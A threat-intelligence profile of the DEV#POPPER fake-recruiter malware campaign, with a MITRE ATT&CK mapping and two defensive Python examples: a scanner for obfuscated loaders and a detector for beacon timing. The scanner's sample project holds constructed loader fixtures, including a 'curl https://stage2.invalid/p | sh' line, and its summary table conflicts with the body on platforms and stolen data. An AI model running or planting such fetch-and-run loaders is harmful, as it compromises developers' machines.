DEV#POPPER
Type of Malware            | Scam
Country of Origin          | North Korea
Targeted Countries         | South Korea
Date of initial activity   | 2024
Motivation                 | Data Theft
Attack Vectors             | Phishing
Type of Information Stolen | Communication Data
Targeted Systems           | macOS
Overview
The DEV#POPPER campaign is a sophisticated and evolving cyber threat that targets software developers through elaborate social engineering. First identified in early 2024, DEV#POPPER is attributed to North Korean threat actors who have continually refined their approach to compromising unsuspecting individuals working in the tech industry. Posing as legitimate recruiters, the attackers use well-crafted lures that convince victims to download and execute malicious files presented as job interview assessments. Once run, these files start an elaborate infection chain that deploys platform-specific malware, which now extends across Windows, Linux, and macOS. This cross-platform reach marks a significant evolution from the campaign’s earlier stages and demonstrates the attackers’ determination to infiltrate a wide range of systems.
Targets
Individuals
Information
How they operate
Initial Access Through Social Engineering
DEV#POPPER relies heavily on spearphishing as its primary method of initial access, with the attackers posing as tech recruiters or business representatives to lure victims into opening attachments. These attachments masquerade as project files, coding challenges, or sample code that a developer would expect to receive during a job interview or recruitment process. When victims download and execute these files, they unknowingly run the malware, which launches a chain of scripts that establishes a foothold on the system. This delivery method is effective because it appeals to the curiosity and ambition of developers eager to showcase their skills or advance their careers.
Establishing Persistence and Gaining Control
Once installed, DEV#POPPER employs a combination of obfuscation techniques and stealthy persistence mechanisms to evade detection. The malware is often embedded in legitimate scripts or application files, using common interpreter languages like PowerShell or Python, which are familiar in development environments. The malicious code often configures itself to launch automatically on system boot or user logon, ensuring that it remains active even after system restarts. It may also create scheduled tasks or services that regularly initiate contact with command and control (C2) servers, allowing attackers to deploy further payloads or update the malware as needed.
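The lure files described above are ordinary-looking project sources with the loader hidden behind encoding and string concatenation (the Base64 and string-concatenation obfuscation the profile lists under T1027). The following pre-execution triage is an added example, not code from the original profile or any tool it names: it scans a downloaded "coding assessment" project for long Base64 runs that decode to interpreter-calling code and for eval/exec over concatenated literals. The token list, regexes and the sample project are constructed for the example.

```python
import base64
import re

# Tokens whose presence in decoded Base64 suggests a hidden loader. This list is an
# assumption for the example, not an indicator taken from the original profile.
SUSPICIOUS_TOKENS = ("eval(", "exec(", "child_process", "subprocess", "osascript",
                     "curl ", "powershell", "http://", "https://")

B64_RUN = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")  # long runs of the Base64 alphabet
CONCAT_EVAL = re.compile(r"\b(?:eval|exec|Function)\s*\(\s*(?:'[^']*'|\"[^\"]*\")\s*\+")

def decode_b64_text(blob):
    """Decode a Base64 run; return text only if it is valid and mostly printable."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    text = raw.decode("utf-8", errors="replace")
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if printable >= 0.9 * max(len(text), 1) else None

def triage_source(path, text):
    """Return (path, reason) findings for one source file."""
    findings = []
    for match in B64_RUN.finditer(text):
        decoded = decode_b64_text(match.group(0))
        if decoded is None:
            continue
        hits = [tok for tok in SUSPICIOUS_TOKENS if tok in decoded]
        if hits:
            findings.append((path, "Base64 blob decodes to code using " + ", ".join(hits)))
    if CONCAT_EVAL.search(text):
        findings.append((path, "eval/exec over a concatenated string literal"))
    return findings

def triage_project(files):
    """files maps relative path -> file text; returns findings across the whole project."""
    return [f for path in sorted(files) for f in triage_source(path, files[path])]

# Constructed "coding assessment" project: one clean module and two hiding a loader.
STAGE2 = "const cp = require('child_process'); cp.exec('curl https://stage2.invalid/p | sh');"
SAMPLE_PROJECT = {
    "src/app.js": "const express = require('express');\nmodule.exports = express();\n",
    "src/config.js": "const p = Buffer.from('%s', 'base64');\neval(p.toString());\n"
                     % base64.b64encode(STAGE2.encode()).decode(),
    "src/util.js": "const k = 'chil' + 'd_process';\nmodule.exports = eval('requ' + 'ire')(k);\n",
}
```

Run `triage_project` over the unpacked archive before opening it in an IDE, since many editors execute project hooks on load; a hit on either rule is reason to detonate the package in an isolated VM rather than on a workstation.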
Credential Theft and Data Collection
One of DEV#POPPER’s primary goals is credential theft, targeting stored credentials, API keys, and sensitive information that developers frequently handle. To accomplish this, the malware leverages keylogging functionality, capturing keystrokes as developers input credentials or sensitive data into development tools and cloud environments. It may also use input capture to steal passwords and access tokens directly from clipboard data or cached entries. This stolen information is crucial for attackers, who can later use it to infiltrate other systems or gain access to proprietary software, source code repositories, and cloud services utilized by the developer or their organization.
Command and Control Communication and Exfiltration
After gathering critical information, DEV#POPPER establishes an encrypted communication channel with its C2 server, typically using HTTPS to mimic normal internet traffic and evade network detection. The malware then exfiltrates collected data, including credentials, system information, and any captured screenshots, over this channel to prevent easy interception. DEV#POPPER also frequently encrypts its payload, further complicating efforts to detect and analyze its activity. This continuous communication loop lets attackers monitor infected systems in real time, deploy additional malware modules, modify existing configurations, or trigger specific actions based on the data collected.
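Because the C2 traffic is HTTPS and the payload is encrypted, content inspection gives defenders little; what the "continuous communication loop" and automated exfiltration do leave behind is timing regularity. The detector below is an added example (not code from the original profile) that parses constructed proxy CONNECT logs and flags a (source, destination) pair whose inter-connection gaps are too regular to be human browsing. The log format, host names and thresholds are assumptions for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not from the original page): "<ts> <src> CONNECT <host:port> <bytes_out>".
# 10.0.0.15 contacts a recruiter-themed host about once a minute; its other traffic is irregular.
SAMPLE_LOG = """\
2024-05-02T09:00:00Z 10.0.0.15 CONNECT code-review-portal.invalid:443 1420
2024-05-02T09:00:12Z 10.0.0.15 CONNECT docs.example.invalid:443 80233
2024-05-02T09:01:01Z 10.0.0.15 CONNECT code-review-portal.invalid:443 1398
2024-05-02T09:01:45Z 10.0.0.15 CONNECT docs.example.invalid:443 12005
2024-05-02T09:02:00Z 10.0.0.15 CONNECT code-review-portal.invalid:443 1455
2024-05-02T09:03:02Z 10.0.0.15 CONNECT code-review-portal.invalid:443 1402
2024-05-02T09:03:10Z 10.0.0.15 CONNECT docs.example.invalid:443 3301
2024-05-02T09:04:00Z 10.0.0.15 CONNECT code-review-portal.invalid:443 1433
2024-05-02T09:05:01Z 10.0.0.15 CONNECT code-review-portal.invalid:443 1410
2024-05-02T09:09:30Z 10.0.0.15 CONNECT docs.example.invalid:443 9210
"""

def parse_log(text):
    """Yield (timestamp, src, dst, bytes_out) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "CONNECT":
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, parts[1], parts[3], int(parts[4])

def detect_beacons(text, min_count=5, max_cv=0.1):
    """Flag (src, dst) pairs whose gaps between connections are regular enough to look timer-driven.
    cv = stdev / mean of the gaps: human browsing gives a large cv, a scheduled beacon a small one."""
    sessions = defaultdict(list)
    for ts, src, dst, nbytes in parse_log(text):
        sessions[(src, dst)].append((ts, nbytes))
    flagged = []
    for (src, dst), events in sessions.items():
        if len(events) < min_count:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
        if cv <= max_cv:
            flagged.append({"src": src, "dst": dst, "count": len(events),
                            "interval_s": mean_gap, "jitter_cv": cv,
                            "bytes_out": sum(n for _, n in events)})
    return flagged
```

Pair the timing score with the destination's age and reputation before escalating: legitimate software updaters beacon too, but they rarely appear first on a developer host in the same hour as an unsolicited "take-home assignment".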
The DEV#POPPER campaign’s highly targeted approach and deep knowledge of development practices make it a potent threat to the software industry. Its combination of social engineering, stealthy persistence, and advanced exfiltration methods highlights the need for developers to remain vigilant and adopt robust security protocols. By raising awareness of these sophisticated techniques, organizations and individuals alike can better defend against campaigns like DEV#POPPER, which exploit both technical vulnerabilities and human psychology to compromise high-value targets.
MITRE Tactics and Techniques
1. Initial Access (TA0001)
Spearphishing Attachment (T1566.001): DEV#POPPER uses highly targeted spearphishing emails, often posing as job recruiters or potential employers. These messages contain malicious attachments, typically disguised as coding assessments or job application tasks, enticing developers to open them.
Drive-by Compromise (T1189): In some instances, DEV#POPPER has used compromised websites or developer forums to host malware-laden files, which unsuspecting developers might download, leading to infection.
2. Execution (TA0002)
User Execution: Malicious File (T1204.002): Attackers rely on social engineering to encourage victims to execute seemingly benign files. These files often contain malware embedded within legitimate-looking scripts or applications.
Command and Scripting Interpreter (T1059): Once on the victim’s device, DEV#POPPER’s malware executes through common scripting interpreters (such as PowerShell, Bash, or AppleScript), depending on the operating system in use.
3. Persistence (TA0003)
Boot or Logon Autostart Execution (T1547): DEV#POPPER establishes persistence by configuring itself to launch upon system boot or user logon. This ensures that the malware remains active even after system reboots.
Scheduled Task/Job (T1053): The malware often creates scheduled tasks to periodically re-establish connections to command and control (C2) servers or execute additional malicious code.
4. Privilege Escalation (TA0004)
Exploitation for Privilege Escalation (T1068): The malware may attempt to exploit vulnerabilities in the operating system or applications to gain elevated privileges, enabling further access and control over the system.
5. Defense Evasion (TA0005)
Obfuscated Files or Information (T1027): DEV#POPPER uses extensive obfuscation techniques, such as Base64 encoding and string concatenation, to disguise its malicious payload and evade detection by security software.
Masquerading (T1036): Malicious files are often disguised with legitimate-looking names or icons, making them appear as harmless files to developers.
Deobfuscate/Decode Files or Information (T1140): The malware contains layers of encoding and decoding routines, making it harder for automated detection systems to analyze its payload.
6. Credential Access (TA0006)
OS Credential Dumping (T1003): DEV#POPPER may attempt to dump system credentials to elevate its access and move laterally across networks. It targets cached credentials, particularly on Windows systems.
Input Capture (T1056): The malware may employ keylogging or input capture to steal login credentials and other sensitive information directly from user inputs.
7. Discovery (TA0007)
System Information Discovery (T1082): DEV#POPPER collects information about the infected host, such as operating system details, installed applications, and network configuration.
Network Service Scanning (T1046): The malware scans for accessible network services, which helps it map the victim’s environment and locate additional attack vectors or valuable targets.
8. Collection (TA0009)
Screen Capture (T1113): DEV#POPPER captures screenshots from the infected system, potentially capturing sensitive information visible on the developer’s screen.
Keylogging (T1056.001): The campaign uses keylogging to capture keystrokes, helping attackers collect credentials, API keys, and other critical information that developers frequently handle.
9. Command and Control (TA0011)
Application Layer Protocol (T1071): DEV#POPPER communicates with its C2 servers using standard application protocols (e.g., HTTPS) to blend in with normal network traffic and avoid detection.
Encrypted Channel (T1573): Communication between the malware and C2 is often encrypted, making it challenging for defenders to analyze the transmitted data without decryption keys.
10. Exfiltration (TA0010)
Exfiltration Over C2 Channel (T1041): The malware exfiltrates stolen data, such as credentials and system information, through its C2 channels, allowing attackers to retrieve the information stealthily.
Automated Exfiltration (T1020): DEV#POPPER regularly transmits data back to the C2 server, automating the exfiltration process to reduce the need for manual intervention.
11. Impact (TA0040)
Data Manipulation (T1565): The attackers may modify or delete code repositories and project files, potentially damaging the victim’s work or sabotaging software development efforts.
Endpoint Denial of Service (T1499): DEV#POPPER’s persistence mechanisms and data collection routines can lead to system slowdowns and unresponsive applications, disrupting the productivity of the developer.